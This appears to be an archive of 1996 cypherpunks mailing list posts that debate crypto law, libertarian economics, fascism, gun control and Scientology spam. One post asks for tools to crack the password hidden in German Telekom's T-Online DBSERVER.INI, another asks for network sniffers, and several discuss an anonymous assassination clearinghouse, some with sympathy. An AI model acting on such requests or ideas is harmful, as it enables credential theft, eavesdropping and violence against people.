MIME-Version: 1.0
Content-Type: text/plain



>>Since you were so certain that Hess was not a staff member of the
>>Cato institute despite being listed as such on their home page

>He isn't. My whole point about P.J. O'Rourke should have made that
>point,

Perry, one last time:

The POINT is that you CORRECTED me in saying Hess was a Cato Institute staff 
member when the Cato Institute THEMSELVES list him as a staff member.

Your correction was ILL INFORMED and WRONG to continue to present this as an 
example of my being in error is somewhat stupid.

It wouldn't be so bad Perry but you can't resist calling someone an imbecile 
when they say something you disagree with. I may occasionaly post without 
checking my facts but I don't call someone a fool without checking my facts. 
When Perry mentioned Hess I did a search on Alta-Vista, found his work at the 
Cato Institute and read it. Unfortunately that search produced hits for the 
father as well as the son but the papers were all by the son. 

P.J. O' Rourke is also listed as a Cato staff member. So to describe him as such 
would NOT be inaccurate. It might not be the best way to describe O'Rourke but 
it would not be an incorrect way.

If you happen to know that the Cato institute is lying then thats another 
matter. Its not unknown for lobby groups to fill out their staff lists with 
bogus placemen but if O'Rourke isn't happy about being called a Staff member of 
Cato presumably his lawyers would be issuing letters. Certainly I would not call 
someone a fool for believing the Insititute of Historical Review when they 
falsely claim that A.J.P.Taylor was a supporter of their position. I might 
correct them and point out that the IHR was lying but I would not 


>>I have heard numerous claims that monopolies cannot ever exist under
>>any circumstances unless they are created by government.
>
>I've never heard that, but I myself have made the argument that they
>are very rare without government intervention. 

Its not a debate that I think its worth having with you and its a pointless 
debate in any case. There is no large company in the world which does not 
interact with government agencies and is not affected by government regulations. 
It is impossible to attribute cause and effect and say what would have been the 
case had government not been involved. The deBeers Diamond cartel was formed by 
Rhodes because he had the only steam pump in South Africa, not because of any 
governmental favours. It has continued because it is in the interests of all 
suppliers to maintain the false price. Granted that the current state of the 
diamond market may not last another twenty years it has already survived a 
century.

Of course monopolies will be rare, by their nature there can only be one in any 
particular industrial sector.


>Of course, thank goodness the U.K. has some of the strictest gun
>control in the world, since it stops these sorts of
>incidents. (I'll point out for Dr. Hallam-Baker's benefit that this
>sentence was "sarcasm".)

Actually it turns out that they are not all that tight after all. But don't 
worry, this is being fixed. 


>And yes, if she'd been carrying not a Kalashnikov rifle but just a
>simple pistol in her pocket she might indeed have been able to shoot
>the guy. I realize this may come as a shock to you, but in a fire
>fight the winner is the guy who fires accurately first, not the guy
>with the longer gun.

Is it just me or is the idea that teachers should be armed with lethal weapons 
somewhat a silly one. For a start the number of teachers who crack and plug a 
youngster being a pain would probably be higher than the current number of 
schools masacres. Secondly it may be just me but I suspect that Hamilton would 
have been the person to shoot first in the Dunblane trajedy.



>Since you are either misreporting or inventing the comments you
>attribute to Friedman and can neither cite the actual article nor
>produce quotes from it, I don't think its entirely fair for you to
>make claims about his position.

Perry, I do not carry a full archive of press clippings arround with me! I gave 
you the reference, you have the opportunity to look it up if you have access to 
an online service with archives from English papers. 


>Amazing how time after time even weak Adam Smithian analysis works
>just fine. Impose price controls on gasoline, and watch shortages form
>when supplies change, as in 1973. 

Perry, you are entirely neglecting the effect of a little cartel in the middle 
east that got together to deliberately force up the price of oil called OPEC. 
While nobody in the west is likely to support their action its a bit rich for 
you to claim that shortages resulted from domestic policy when the oil producing 
countries enacted a deliberate policy to force the price of oil up. From the 
supplier country point of view its hard to argue that the OPEC move was a bad 
one, it allowed them to drastically increase the value of their oil stocks. Its 
a pity that little of that reached the people in those countries but that is 
capitalism for you.


>Ask all the people defecting from Cuba if they think your way is
>better some time. Be prepared to wipe the spit off your face.


Perry you are worse than a fool. I have never been an appologist for Castro or 
his self serving ideology. It is ideologues like Castro and yourself who do the 
real damage. By idealogue I mean someone who tries to pretend that society can 
be organised according to a single overarching principle which is believed in as 
an article of faith. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 9 Jun 1996 15:31:16 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199606082209.RAA19856@manifold.algebra.com>
Message-ID: <k5H9oD71w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> > While I appreciate your...uh...appreciation, let me remind you that part of
> > my "pronouncements" are that the current political and social system is
> > sick.  Many people around here seem to agree with this assessment.  What I
> > advocate is a comparatively simple change in the rules that could have the
> > effect of vastly changing the way things are done.  Whether these changes
> > are in "the best interests of the inhabitants of this nation" is still an
> > open question, and many people have agreed with me on this matter.
> >
>
> Since corrupt officials are likely to have more anonymous cash that
> phreedom phighters, guess who will win.
>
> Also, think about this: lots of people have someone they'd like
> to assassinate but do not actually do it because of lack of anonymity
> and associated hassles (like dealing with assassins non-anonymously,
> abundance of traces, possible confession of the assassin and so on).
> With your assassination clearinghouse these hassles go away. I think it
> would present an excellent prospect for reducing the population.

Igor, have you ever read novels about British life in 18th century?
(I'm using this as an example because every good Russian reads them. :-)
Have you noticed how exaggeratedly polite they were to each other,
in comparison to Americans today? Do you know why?
Because back then, every gentle person was armed and might use violence
in sufficiently provoked.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 9 Jun 1996 17:07:54 +0800
To: cypherpunks@toad.com
Subject: Re: US: Domestic Encryption Protected by US Constitution?
Message-ID: <addfac9c060210043f32@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:26 AM 6/9/96, C Matthew Curtin wrote:

>Given that the US State Department classifies strong crypto as
>munitions, is it possible that any laws passed outlawing the use of
>strong crypto among US citizens could be declared unconsitutional, in
>violation of the second amendment?
>
>Are there any legal precedents that apply here? Is the question purely
>academic (i.e., no such laws exist, no such bills are in the works, or
>none have been tried)? Does anyone know of any laws on the books that
>might be relevant to my question?


I recall that this general issue was discussed several times on the
"Cyberia-l" mailing list, a list consisting mostly of law professors,
lawyers, law students, and a bunch of Cypherpunks. (I left that list
several months back.)

Some points:

1. There are currently no laws restricting crypto use in the U.S., save for
some special circumstances (e.g., sending code over the ham radio band).
There being no laws, no courts have been asked to rule on such laws.

(I don't mean to sound confusing and circular here. The point is that the
boundaries of a law get shaped when the law is tested. Inasmuch as there
have been no laws about domestic use of crypto, we have little guidance as
to how the courts will frame arguments should such a law ever be passed.)

2. Most advocates for a continued right to use strong crypto have used the
First Amendment centrally. That is, "encrypted speech is still speech." Any
demand that speech conform to government standards would run into the basic
point that Congress is not to make such laws.

I believe this approach is the strongest one. Even if there are some limits
on speech (a la the infamous "falsely shouting 'Fire!' in a crowded
theater" example), this sort of limit does not limit the _form_ of speech.

(Quibblers may point out other such limits, even some on _form_. For
example, speech at 95 dB is OK, but "speech" at a jet-engine level of 135
dB is not. I won't get into such quibbles here.)

Casting a pro-crypto argument in terms of the Second Amendment ("encrypted
speech is a weapon") opens the door to all kinds of potential arguments for
restricting access to crypto. Think of all the various limits on firearms
ownership and use: certain calibers and types are restricted, the shapes of
firearms are controlled, special taxes are often required, waiting periods
for purchase, no ownership by convicted felons, no possession on or near
schoolgrounds, bullet types are controlled, limits on magazine capacity, no
possession of biological weapons, etc. etc. etc.

I don't think we want crypto controlled by the Bureau of Alcohol, Tobacco,
and Firearms, do we?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 9 Jun 1996 15:29:13 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199606090034.TAA20636@manifold.algebra.com>
Message-ID: <VLi9oD75w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> You haven't seen _real_ corrupt officials. :)

Jim - could corrupt gov't official hide behind anonymity too?
E.g., a particularly obnoxious gov't regulation being issued from
behind anon remailer?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 11 Jun 1996 17:31:31 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous return addresses
In-Reply-To: <199606082329.QAA14538@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960608224227.128A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 8 Jun 1996, Hal wrote:

> The other one was "Holding Intruders Accountable on the Internet" and it
> had one strange comment.  Basically it was about a way of trying to track
> down cracker types who break into systems.  One strategy these people use
> is to log into a whole series of insecure hosts, one after the other,
> before attacking their target.  Then tracing back where they came from is
> very difficult.  Cliff Stoll's "The Cuckoo's Egg" is the classic account
> of how hard it is to trace these people.  Probably the new books about
> Mitnick talk about the same thing.
> 
> The idea in this article is that you monitor the whole net and track
> all the rlogin and telnet traffic between pairs of hosts.  Then they
> describe a statistical technique for determining that two different
> telnet sessions are chained together by recognizing the same patterns
> of traffic on them.  Basically they count the frequency of spaces and
> punctuation marks on minute-long time slices and try to correlate
> them.  This way you can tell that the intruder attacking here is also
> using these other hosts over there, and try to track him down that
> way.
> 
> I don't think this is very practical, and I have mixed feelings about the
> technology - I don't favor breakins, but the kinds of surveillance that
> would be necessary to implement their technique seem very threatening.
> Also they do mention the obvious countermeasure of using encryption at
> each stage, which would be easy with such things as the secure remote
> shell programs around now.

I don't really understand how such a system would work.  It would either
require some kind of centralized system to receive information from each host
being monitored, or each host would have to contact another and relay the
connection information.  The former would require too much bandwidth and the
latter would open up hosts to easy eavesdropping attacks.  The only alternative
is for sysadmins to monitor syslog activity which is (hopefully) done already.

[...]
> 
> So apparently in the view of these authors anonymous remailers are
> maintained by "the intruder community."  It is unfortunate that we have
> this image among some member of the larger community.  BTW, there are
> periodic suggestions here to run general-purpose connection redirectors,
> but people should be aware of the problem that cracker types would seize
> on these as another shield for their crimes.  These would have to be
> limited to specific uses, such as port 80 which is the http port and
> which hopefully can't easily be used for attacks.

Unfortunately, httpd is very insecure.  First of all, cgi scripts are very
difficult to make secure and can be exploited quite easily.  There may also
be buffer-overflow problems.  It's about as difficult to make connection
redirectors safe from cracker use as it is to make anonymous remailers safe
from child pornographers, terrorists, and other horsemen.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbo8bbZc+sv5siulAQFfJAP+K8Fl268+FFZ1NRkqQfndKpGvyhH0DYya
ADgQSTClURwL5zWss7esRIpPSvBybCp9JPh9O9v53sTcOToiDWfuAJmuqrugycQa
QyzZW0FI+eNOfZfnMSvNJBs/5LAv2qCLgHDUX4RbT2O9zpaBkp7xAIibc3mQC8ED
CmDACy3Kt24=
=b7Ug
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 9 Jun 1996 15:54:26 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: RFD: Time to kick some anti-scientologist ass?
In-Reply-To: <XBq8oD69w165w@bwalk.dm.com>
Message-ID: <960608.225259.7F4.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, dlv@bwalk.dm.com writes:

> Or the anti-scientologists haven't caused most of the problems cypherpunks
> remailers face through posting CO$ copyrighted material through them?

> (Note: I'm not a Co$ affiliate and have exactly as much disdain for it as
> for any other cult.)

Am I the only one whose ironometer just pegged?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbpK3xvikii9febJAQGAgAP+PSHGQarfMIeZiwXZrlsSoaY3rduI2gFe
HIH2ml2gLUlAUwEXd/Jd4uxIBqeCXJOdcjgA8zz0B5ddCpGshhrD3/XIzIWIteOz
2NdyK6dIZx64wo7gYGOzTDFhx8i2GXn3nhaxyMwEHpOqZ+Uk3wflmKWbCq5cJivx
H2B1gSMQlpo=
=pzuj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@fahlgren.com>
Date: Sun, 9 Jun 1996 15:00:37 +0800
To: <cypherpunks@toad.com>
Subject: US: Domestic Encryption Protected by US Constitution?
Message-ID: <199606090326.XAA06963@goffer.ee.net>
MIME-Version: 1.0
Content-Type: text/plain



Something that has come up in my recent random thoughts...

Given that the US State Department classifies strong crypto as
munitions, is it possible that any laws passed outlawing the use of
strong crypto among US citizens could be declared unconsitutional, in
violation of the second amendment?

Are there any legal precedents that apply here? Is the question purely
academic (i.e., no such laws exist, no such bills are in the works, or
none have been tried)? Does anyone know of any laws on the books that
might be relevant to my question?

--
C Matthew Curtin                                                Chief Hacker
Fahlgren, Inc.    655 Metro Pl S, Ste 700, Box 7159     Dublin OH 43017-7159
http://www.local.com/~cmcurtin/  cmcurtin@fahlgren.com    PGP Mail Preferred




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian.K@t-online.de (Dr. Atomic)
Date: Sun, 9 Jun 1996 09:05:19 +0800
To: cypherpunks@toad.com
Subject: lets hack German Telekom
Message-ID: <m0uSVpW-0000ncC@ermail00.btx.dtag.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello guys,

i am from Germany and i want to ask you, if you know something about
the password-encryption of the T-Online Decoder from German Telekom!

I tried to crack it, but it is not easy!
The password is hidden in a file called DBSERVER.INI.
If someone know how to crack it or has any programms please let me 
know!


--------------------------------------------------------------------
written by Atomic (christian.k@t-online.de)             ;-)
But remember! A Homepage will soon be variable, too.     :-o
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 9 Jun 1996 15:35:27 +0800
To: David Rosoff <jimbell@pacifier.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <9606090406.AA19866@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Jun 96 at 12:40, jim bell wrote:

> JFA wrote:
> >I did something I always bitch at when done by others: looking at a
> >situation outside of it's appropriate and complete context.  
> 
> As you can see, this is one of the big difficulties that people can
> have understanding AP:  Since it changes just about everything about
> how a society works, you can't analyze it "easily" using your
> built-up knowledge of societies.

Actually, it makes one realize that society and the "collective" is 
nothing, that the basic building block is the individual.  If you 
analyse the motivation of the individual, AP is not difficult to 
understand.

> As I've said so many times before, AP is like a political Rorschach
> test:  Your reaction to it is strongly related to your political
> philosophy.  That's part of the magic.

Please stay out of magic.  The actual politician are enough into it.


JFA
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 9 Jun 1996 18:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: RFD: Time to kick some anti-scientologist ass?
Message-ID: <2.2.32.19960609071830.009e7374@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:52 PM 6/8/96 CST, roy@sendai.scytale.com wrote:
[snip]
>Am I the only one whose ironometer just pegged?

Actually, now that you mention it, mine is pegged.  I hadn't noticed,
because I was busy trying to recalibrate my bullshit detector which
was off the fucking dial.

LD's post is full of shit.

David Gerard, Jon Noring, and Ron Newman are not "flamers."  People
who have even lurked there for a short while should know this.  I've
seen Ron urge people towards compassionate behavior on a.r.s. more than
just about anyone on a.r.s.  It's a bit hard to be compassionate when
you're dealing with a group that uses every means at its disposal to
silence its critics.

I don't even think Nauta is on a.r.s., except for perhaps an occasional
crosspost or two.  Perhaps he lurks, but he doesn't post there to any
significant extent.

I don't know of any "Anti-Scientologists" who are forging cancels.  I
really doubt anyone would have checked with Dimitri first, though :)
JEM did issue a bunch of cancels, as have some of the ISPs whose
services have been abused.

We have been inundated with over 12,000 "vertical spam" posts since
May 19th, and it's still coming in.  Many of these posts are
repetitions of the same materials, and must be well over the BI by
now.

"Anti-Scientologists" have discussed various technological methods of
dealing with the spam (cross-posted to news.admin.net-abuse), but no
plan has been seized upon due to lack of consensus.

I've written an article in the latest issue of my zine about the spam,
if people would like more info.  URL in my sig.


Rich



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbp6fYT0GKfZRA/9AQFGVgQAvvH4Fa8nwF6qbqHGVuKfO2uv0Ynw388Z
0QxO42wIzt9VrNckRvn+geYFRRYu9DoasGCw8imQqBN85OY3OasjpOIycyQnrjEW
C3MqyP44esuyThI6Ds30bwFYc4rP+ZWFWp1rmgv3LmYAaPdh1dAwtzPsKzy4N4NF
0pLAsusDr9k=
=PSIh
-----END PGP SIGNATURE-----
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 9 Jun 1996 17:51:41 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606090521.WAA14979@dns2.noc.best.net>
Message-ID: <199606090637.AAA01593@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Normally I wouldn't comment, but:


James A. Donald writes:

> At 02:25 AM 6/8/96 +0200, Asgaard wrote:
> > Who is going to assure that someone has an ownership stake in the
> > Humpback Whales? The World Government?
> 
> Brand them and herd them like open range cattle.

Branding whales?

Um, what? 


                                -- Will


(Maybe digitally signing whales might be more appropriate for this forum...)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 9 Jun 1996 18:49:29 +0800
To: jamesd@echeque.com
Subject: Re: NOISE: "Fascism is corporatism"
In-Reply-To: <199606081932.MAA03833@dns2.noc.best.net>
Message-ID: <Pine.GUL.3.93.960608223458.6149D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 8 Jun 1996 jamesd@echeque.com wrote:

> At 07:09 PM 6/7/96 -0700, Rich Graves wrote:
> > you forget that I'm a
> > Certified Political Scientist. 
> > [...]
> > Once they got in power, then they started developing an economic ideology.
> 
> Untrue:
> 
> Fascism is of course a reasonably complete, coherent, and 
> philosophically consistent logical system, almost as coherent as 
> marxism, and far more logical than Mill's utilitarianism.  It was 
> published and thoroughly debated well before they pursued or took power.

Besides being unture, this is rather skew to the discussion of whether
fascism = corporatism = Clinton. Whether it is possible to construct a
coherent ideology is rarely relevant to historical processes; was Castro's
Moncada attack motivated by Marxist ideology, for example? But anyway...

> Rich Graves's lie is a lie I frequently hear from those who well 
> know the truth, 

I know you & Tim aren't impressed by Webster's, which Tim claimed as an
authority without bothering to check whether it agreed with him at all (it
doesn't; in fact, it directly contradicts him), but how about The
Encyclopedia Brittanica on "The Philosophical Bases of Fascism":

 In its beginnings fascism was not a doctrine and had no clearly elaborated
 program. It was a technique for gaining and retaining power by violence, 
 and with astonishing flexibility it subordinated all questions of program
 to this one aim. From the beginning it was dominated by a definite
 attitude of mind that exalted the fighting spirit, military discipline,
 ruthlessness, and action and rejected all ethical motives as weakening the
 resoluteness of will. 

It pleases me greatly that you do not presume to call me a fool.

I've cited Machiavelli, the historical progression of risorgimento, and Paul
Morrison, "The poetics of fascism :  Ezra Pound, T.S. Eliot, Paul de Man," 
ISBN 0-19-508085-8. All you're doing is blathering on with some
anti-intellectual lumpenlibertarian claptrap that tries to smear anything
you disagree with as tantamount to fascism. You do libertarianism, with
whose precepts I wholeheartedly agree, a serious disservice. Go back to
Bastiat and leave history alone.

The Encyclopedia Brittanica says of Mussolini:

 He read widely and voraciously, if not deeply, plunging into the
 philosophers and theorists Immanuel Kant and Benedict de Spinoza, Peter
 Kropotkin and Friedrich Nietzsche, G.W.F. Hegel, Karl Kautsky, and Georges
 Sorel, picking out what appealed to him and discarding the rest, forming no
 coherent political philosophy of his own yet impressing his companions as a
 potential revolutionary of uncommon personality and striking presence. 

For a more nuanced view, try A. James Gregor's "Young Mussolini and the
Intellectual Origins of Fascism," ISBN 0-520-03799-5. I could mail you
photocopies of the relevant sections if you like. 

> Many of my readers will think I am excessively harsh, calling Rich
> Graves a liar rather than a fool, but I hear the above story 
> (that fascism is not a coherent ideology or philosophy) primarily from
> those whose interests this story serves, and if they genuinely 
> thought this story was true, they would not know that it is in their
> interests to push it.

[Boggle]

Huh? In English, please.

[much more content-free blather deleted]

Anyway, I never suggested that there was no such thing as fascist
philosophy; just that fascism was not rooted in a well-developed ECONOMIC
ideology, and that Tim's definition of corporatism is incorrect both in the
abstract and in the cases of Italian fascism and Nazism.

> Not only do such concepts as feminist science, phallocentric science, 
> etc, strongly resemble such concepts as aryan science, jewish science, 
> etc, but they are justified using the same arguments from the same 
> philosophers.  Indeed Heidegger was not only a philosopher of fascism, 
> but he personally participated in Hitler's terror, terrorizing his academic
> colleagues, and Paul De Man of Yale University worked directly for the 
> Nazis as a propagandist in occupied Belgium.

How did we get from economics to philosophy?

Here James demonstrates his absolute mastery of the subject.

Heidegger only really supported Nazism from 1933-34; in the 40's and
thereafter, he referred to Nazism as a disease. He is remembered as an
existentialist, not a Nazi, though he did join the party when he became the
rector of Freiburg. I don't believe that either Hitler or Goebbels were
familiar with Heidegger's philosophical work.

The fact that Paul de Man, in his early years in Nazi-occupied Belgium,
wrote antisemitic propaganda for a number of local collaborationist journals
was not discovered until four years after his death (by Ortwin de Graef). 
The statement "Paul de Man of Yale University worked directly for the Nazis" 
is not true in the sense that most readers might think. He collaborated,
left, and started a new life. He contributed absolutely nothing to Nazi
philosophy, because he did not become a philosopher until years after the
war -- probably as a way to cope with the horrors he saw, and the shame of
his cowardly collaboration.  I don't think anyone has suggested that de Man
was a serious Nazi -- just a fucking wimp.

Where are you getting this nonsense about Heidegger and de Man? I have no
sympathy for their views, but any attempt to smear them as a bunch of Nazis
is ludicrous. Give me a reference. This is sure to be amusing.

By the way, I voted for Bush, and no matter how many times you contradict
me, I know I don't support the government's actions at Ruby Ridge. Your
foaming-mouth projections on people who disagree with you are laughable.

James, I have a lot of respect for Tim and Bruce (anyone who thought I was
calling Bruce a Nazi for holding a common libertarian fallacy must be
oxygen-deprived), but you're really losing me here.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 9 Jun 1996 18:48:49 +0800
To: "cypherpunks@toad.com>
Subject: RE: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
Message-ID: <01BB559F.9D9D18A0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	hallam@Etna.ai.mit.edu

	How to save the whales is a logical outcome of Friedman's thesis that markets 
are everything. It is unfortunately very common for great men to get megalomania and 
believe they have the solution to the worlds problems in one theory.

	The flaw in Perry's "stakeholder" theory is the same one in many academic 
theories. It assumes that most people are smart enough to realise their true interests. 
It assumes that people take a longer term look than they do. 
................................................................................................


A point about the free market:

Those "great men" who advocate it realize that one theory may not solve the world's problems, that individuals themselves can come up with the answers to their own problems.

Instead of other people's theories and solutions being imposed upon them, individuals 
are seen as capable of interacting with each other and making decisions and trades in the market of choices made available through commercial enterprise, thus involving themselves in the discovery, pursuit, and satisfaction of their true interests.

It doesn't assume that because people's judgements can be flawed and that they can make mistakes, that therefore others (governments & other authoritative types) have the right to step in and determine for them how their dreams should be realized.  

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 9 Jun 1996 18:49:21 +0800
To: cypherpunks@toad.com
Subject: Re: Thank you for the Archives 100 messages
In-Reply-To: <199606071402.HAA10943@netcom4.netcom.com>
Message-ID: <Pine.GUL.3.93.960609005510.6682B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Jun 1996, Skippy <qut@netcom.com> shared with the group:

> Apologies, but rich has deleted me from
> his mailboxes, and for a few days now,

This isn't true. I don't believe in killfiles. Being on my twit list simply
means that you're entitled to a brief acknowledgement of every message you
send me. Skippy was added after he sent me the 3MB results from the
rec.music.white-power vote as a rather limp mailbombing attempt (free clue:
it takes a lot more than that to make a dent in our bandwidth or disk
space); see http://www.stanford.edu/~llurch/potw2/rec.music.white-powder for
that email. 

> somebody has placed a global cancel bot on
> me.  I'm gonna have plenty of fun figuring
> this out.  Kwow any good sniffers?

The one that used to be running on darth.stanford.edu was pretty good. 
Since February 22nd, I've working on the assumption that everything I do
unencrypted is public. I would revoke my PGP key, but I never used it much
for receiving mail anyway, and I'm not sure that it was found. 

> I agree the list should be public usenet:
> A mail gate-way to a usenet group that
> ALSO permits unmoderated posts.  This
> would be a nice way to combine a strict
> moderated mail-list, with a standard 
> netnews group.

Gee, what a great idea! Why hasn't anyone thought of that? hks.net, for
example. Unfortunately, there are too many copyright terrorists here.
There's a tradeoff between freedom and visibility. As astute readers are
aware, hks.net had to take down the archives after WSJ made a threat that
was a little too credible.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 9 Jun 1996 18:57:36 +0800
To: Jamie Lawrence <foodie@netcom.com>
Subject: [WAY, WAY NOISE] Re: Reference Correction Re: Thank you for the, Archives 100 messages
In-Reply-To: <v02140b02ade008e3f040@DialupEudora>
Message-ID: <Pine.GUL.3.93.960609011452.6149E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 8 Jun 1996, Jamie Lawrence wrote:

> Careful Alan; I didn't write that.
> 
> That was qut@netcom.com, the latest addition to my killfile,
> who replied to my private email on Cypherpunks, and, rather oddly,
> called me a Mormon.

For enlightenment on that point, see Skippy's message "Christ was NOT a
Mormon" in alt.zen and 35 other newsgroups, <qutDrFypn.6Io@netcom.com>,
http://ww2.altavista.digital.com/cgi-bin/news?plain@msg@33480@rec%2emusic%2echristian

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 9 Jun 1996 18:23:49 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re:
In-Reply-To: <k5H9oD71w165w@bwalk.dm.com>
Message-ID: <199606090728.CAA21978@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> ichudov@algebra.com (Igor Chudov @ home) writes:
> > Also, think about this: lots of people have someone they'd like
> > to assassinate but do not actually do it because of lack of anonymity
> > and associated hassles (like dealing with assassins non-anonymously,
> > abundance of traces, possible confession of the assassin and so on).
> > With your assassination clearinghouse these hassles go away. I think it
> > would present an excellent prospect for reducing the population.
> 
> Igor, have you ever read novels about British life in 18th century?
> (I'm using this as an example because every good Russian reads them. :-)
> Have you noticed how exaggeratedly polite they were to each other,
> in comparison to Americans today? Do you know why?
> Because back then, every gentle person was armed and might use violence
> in sufficiently provoked.

Actually, here in Oklahoma almost everyone has a gun (not that they use
them though, but many carry). Incidentally, everyone including most down
to earth truckers is exceedingly polite. When I went to NYC first time,
I was shocked how less polite people were in comparison with Oklahomans.

Are the folks in Flushing, NY or around Avenue of the Americas allowed to
possess firearms? :)

Russians in Russia are even less polite, and guns are outlawed.

Maybe your hint really makes sense and after initial depopulation the
citizens will use different, more considerate, ways of dealing with each
other. Or, alternatively, maybe people will hide behind anonymity most
of the time to avoid becoming vistims of jimbell's clearinghouse.
Really, it is very hard to assasssinate username@alpha.c2.org, although
it is possible to hire nyms to write programs and pay them hard earned
digicash.

If we think about anonymous computer contractors and anonymous
employers, the interesting question is how to maintain reputations and
how to check references.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 9 Jun 1996 13:43:19 +0800
To: cypherpunks@toad.com
Subject: Re: Anti-Scientologists
Message-ID: <199606090245.EAA05922@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>1. There's a gang of flamers (David Gerard, Jon Noring, Ron Newman, Rob J.
>Nauta, and the like) who try to stop $cientologists from discussing their
>religion on the Usenet newsgroup alt.religion.scientology. Most of them are
